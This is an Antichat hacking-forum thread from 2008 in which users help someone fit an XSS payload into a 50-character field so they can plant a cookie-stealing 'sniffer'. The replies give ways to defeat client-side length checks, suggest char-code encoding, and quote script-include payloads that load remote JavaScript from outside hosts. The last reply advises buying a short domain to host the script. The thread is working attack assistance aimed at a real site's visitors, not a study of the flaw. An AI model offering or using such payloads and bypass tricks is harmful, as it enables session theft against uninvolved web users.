Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Обход ограничений символов (xss) ? (https://forum.antichat.xyz/showthread.php?t=77967)

geforse 21.07.2008 19:03
Обход ограничений символов (xss) ?
 
Вот есть поле, там работает алерт, но ввод символов ограничен...как можно обойти данное ограничение ? (для снифера)

Shred 21.07.2008 19:12
возможно ограничение реализовано путём выставления значения size, попробуй сохранить страницу, переопредели это значеие для уязвимого поля на более длинное, пропишу полнуй путь к скрипту и попробуй выполнить. Второй вариант, то что возможно проверка реализована только ява скриптом, нада либо найти это место и вырезать либо отключить выполнение жабаскрипта, но тогда ты сам не увидишь результат выполнения :) . Но это всё оочень мало вероятно и скорей всего проверка и на клиенте и на серванте :)

BlackSun 21.07.2008 19:30
Цитата:
но ввод символов ограничен
И что мы под этим должны понимать? ограничение по размеру или фильтрация? а может поле заколдовано и на хакеров, пытаюшихся его заxssить наводится порча?

Chaak 21.07.2008 19:42
юзай кодировку в чарс

Qwazar 21.07.2008 19:43
Код:
<script src="http://www.ya.ru/1.js"></script>
- короче ничего не знаю :(

mr.The 21.07.2008 19:48
инклудом
Цитата:
<SCRIPT SRC=http://xek.site/xss.js></SCRIPT>

geforse 21.07.2008 20:01
в поле можно водить только 50 символов.
инклуд, самое оно :) но нужен короткий домен(

Qwazar 21.07.2008 20:17
Купи, трёхбуквенники ещё остались.


Время: 04:07